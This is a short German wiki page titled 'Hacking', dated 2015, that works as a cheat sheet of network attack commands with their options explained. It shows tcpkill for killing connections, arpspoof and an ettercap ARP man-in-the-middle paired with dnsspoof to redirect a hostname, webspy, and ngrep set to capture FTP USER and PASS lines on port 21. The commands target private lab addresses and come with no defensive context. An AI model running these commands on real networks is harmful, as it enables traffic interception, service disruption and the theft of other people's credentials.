Hacking
Version vom 13. Oktober 2015, 08:20 Uhr von Thomas (Diskussion | Beiträge)
sniff
Tcpkill
tcpkill port 80 optionen port 80 = Muster wie bei tcpdump
Arpspoof
arpspoof -t 192.168.254.7 192.168.254.5 optionen -t 192.168.254.7 = Angriffszeil 192.168.254.5 = Mac Adresse wird mit lokaler MacAdresse vertauscht
Webspy
mozilla& webspy 192.168.254.22
Dnsspoof
Der Nameserver muss umgeleitet werden ettercap -T -q -M ARP /192.168.254.22/ /192.168.254.4/ hosts anlegen 192.168.254.4 www.xinux.de dnsspoofen dnsspoof -f hosts
Ngrep
Installation unter Ubuntu oder Debian
apt-get install ngrep
Passwörter spionieren mit ngrep - Beispiele
sniffen ngrep -d eth1 -s 1500 -l -i 'PASS|USER' port 21
optionen -d eth1 = Schnittstelle -s 1500 = Länge des Mitschnittes pro Paket -l = Ausgabe wird zeilenweise gepuffert -i = Ignoriere Gross und Kleinschreibung 'PASS|USER' = Suchmuster in den Daten PASS oder USER port 21 = Muster wie bei tcpdump